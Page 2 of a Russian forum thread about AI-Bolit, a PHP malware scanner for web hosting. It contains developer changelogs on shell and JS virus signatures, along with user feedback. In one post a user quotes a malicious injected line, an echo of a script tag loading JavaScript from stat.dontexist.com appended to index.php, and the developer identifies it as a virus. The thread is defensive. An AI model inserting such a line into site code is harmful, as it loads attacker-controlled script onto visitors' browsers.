Скрипт поиска вредоносного по на хостинге

(Ответов: 77, Просмотров: 15223)
Страница 2 из 8 Первая 1234 Последняя
  1. Студент
    • Регистрация: 30.04.2012
    • Сообщений: 44
    • Репутация: 2
    Проверку в скрипте на обнловления планируется ввести ? Если есть обновление - можно отсылать соответсвующее письмо на почту :)
    Последний раз редактировалось Eldar; 30.04.2012 в 23:27.
    • 0
  2. Студент
    • Регистрация: 21.03.2012
    • Сообщений: 58
    • Репутация: 30
    • Webmoney BL: ?
    Планируется. На счет письма - не уверен. Просто будет показываться сообщение о неактуальности текущей версии.

    Кроме того, вышла новая версия 20120430:

    - новые сигнатуры вирусов и шеллов
    - исправлена ошибка сканирования списка файлов
    - исправлена ошибка подсчета файлов в каталоге для вычисления дорвеев
    - корректная работа с русскими сообщениями при работе через веб и при запуске из командной строки
    - выставляется принудительно кодировка utf-8
    - добавлены сниппеты для javascript вирусов и некоторых видов редиректа в .htaccess
    - немного улучшен дизайн отчета
    - сообщение о найденных больших файлах выдается только при полном сканировании
    • 0
  3. Студент
    • Регистрация: 21.03.2012
    • Сообщений: 58
    • Репутация: 30
    • Webmoney BL: ?
    Новое в версии 20120512

    - добавлен алгоритм дешифрования ASCII последовательностей перед проверкой сигнатур - это очень серьезный прорыв. Теперь кол-во детектируемого зла вырастет в разы.
    - три новых сигнатуры JS вируса
    - три сигнатуры шелла
    - добавлена проверка .phtml и .shtml по-умолчанию
    - исправлена ошибка отображения файлов с невидимыми ссылками

    Рекомендую скачать и проверить ваши сайты.
    http://revisium.com/ai/
    • 0
  4. Новичок
    • Регистрация: 07.03.2012
    • Сообщений: 13
    • Репутация: 0
    • Webmoney BL: ?
    Цитата Сообщение от mnemonic Посмотреть сообщение
    добавлена проверка .phtml и .shtml по-умолчанию
    а еще есть khtml :)
    • 0
  5. Студент
    • Регистрация: 21.03.2012
    • Сообщений: 58
    • Репутация: 30
    • Webmoney BL: ?
    Изменения в версии 20120613

    - добавлены 6 сигнатур шеллов
    - добавлены 3 сигнатуры JS вирусов
    - добавил вызов set_time_limit(0) в скрипт
    - исправлена работа с расширениями для php
    - учитывается .phtml при проверке на сигнатуры, добавлено расширение .khtml
    - добавлено детектирование auto_append_file/auto_prepend_file в .htaccess
    - вывод списка найденных невидимых ссылок
    - добавил определение stripos, если ее нет в PHP
    - исправлено несколько мелочей

    Качаем http://revisium.com/ai/.

    Рекомендую проверять хостинг в режиме "все файлы" хотя бы раз в месяц. В качестве бонуса вот еще статейку написал: http://www.revisium.com/kb/protect_advice.html
    • 0
  6. Опытный Аватар для Kyrsor
    • Регистрация: 12.03.2012
    • Сообщений: 428
    • Репутация: 51
    5 бальная вещь! Надеюсь будите развивать!
    • 0

    Спасибо сказали:

    mnemonic(13.06.2012),
  7. Новичок
    • Регистрация: 12.06.2012
    • Сообщений: 14
    • Репутация: 0
    скачал. проверяю. спасибо! уверен что штука оч. нужная. особенно для моего сайта :) - индусы, китайци и латиносы уже задолбали искать дыры и подбирать пароли... однако иногда им это удавалось..

    Для информации - я настроил апаче так, что вместо .htaccess используется другой файл. и никто не знает какой.... кроме апаче и меня... может кому тоже пригодится такая защита от вирусов - .htaccess есть, а апаче он и не нужен - приманка для вирусов. а кто туда полез - того в бан по IP.

    А реально ли сделать такой скрипт, что бы он ловил обращения к сайту "на лету" + банил по IP и по всяким вредным для сайта запросам и атакам на Mysql и БД? В своё время я делал подобное - но только для .exe файлов. Т.е. файл (сайт) сам себя защищает от вторжений и от несанкционированных изменений.

    ---------- Сообщение добавлено 03:58 ---------- Предыдущее 03:32 ----------

    mnemonic,echo '<script src="http://stat.dontexist.com/style.js"></script>'; -вот такая штука дописывается в конец конец файла индекс.пхп и сайту приходит пипец. это что за хрень?
    • 0
  8. Студент
    • Регистрация: 21.03.2012
    • Сообщений: 58
    • Репутация: 30
    • Webmoney BL: ?
    valnick, про .htaccess вы бы написали инструкцию для людей, как это сделать. Да и нужно пояснить, что это можно будет сделать только на выделенном сервере (или виртуальном выделенном).

    вот такая штука дописывается в конец
    Вирус. Подключаться может многими вариантами: из БД, через auto_append, просто по FTP. Если интересуют детали - напишите мне на почту (на сайте айболита есть).

    Вот почитать на ночь:
    http://forum.searchengines.ru/showpo...8&postcount=58
    http://www.revisium.com/kb/protect_advice.html
    • 1

    Спасибо сказали:

    valnick(14.06.2012),
  9. Студент
    • Регистрация: 21.03.2012
    • Сообщений: 58
    • Репутация: 30
    • Webmoney BL: ?
    Изменения в версии 20120622

    - появился список игнорируемых файлов .aignore
    - добавлена возможность просмотра файла
    - добавлены сигнатуры шеллов
    - есть возможность скрыть в отчете показ директории открытых на запись
    - в подозрительные добавлены подстроки, появляющиеся в обфусцированных скриптах
    - добавлена проверка на наличие хакерских тулзов для FreeBSD
    - несколько багфиксов

    Теперь можно ткнуть в имя файла и посмотреть его полное содержимое.
    А еще в этой версии я все-таки решил реализовать список игнорируемых файлов (по фрагменту имени и контрольной сумме). Можно вручную создать файл .aignore и положить в него

    фрагмент имени файла1 <табуляция> контрольная сумма1
    фрагмент имени файла2 <табуляция> контрольная сумма2
    ...

    А можно просто кликать по значениям столбца CRC32, а потом внизу скопировать из формы содержимое в файл. Если вам надоело наблюдать длинный список ложносрабатываемых файлов из джумлы, tinyMCE, vBulletin или друпала, просто создайте свой собственный .aignore и положите его рядом с ai-bolit.php.

    Качаем свежую версию http://revisium.com/ai/ с обновленными сигнатурами.
    Скоро сделаю еще много полезных фишек в скрипте. Следите за апдейтами.
    • 0
  10. Дипломник Аватар для volos_86
    • Регистрация: 21.11.2011
    • Сообщений: 159
    • Репутация: 20
    mnemonic, Внушительный такой список изменений получился. Было бы круто распространять такой файл (по умолчанию или по желанию) для дефолтных сборок популярных цмс
    Перенос вашего сайта на новый хостинг.
    Представитель: hostpro.ua (напишите мне)
    • 0
Страница 2 из 8 Первая 1234 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Аккаунт на хостинге
Прочее 4 04.02.2012 17:36
Скрипт для полуавтоматического поиска доменов .TK с ТИЦ и PR
Дайджест блогосферы 1 29.03.2011 20:16
Сайтов на хостинге...
Вопросы от новичков 6 17.04.2010 11:44
Значительная экономия на хостинге, как вам?
Хостинг и Серверы 23 30.09.2009 17:02

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры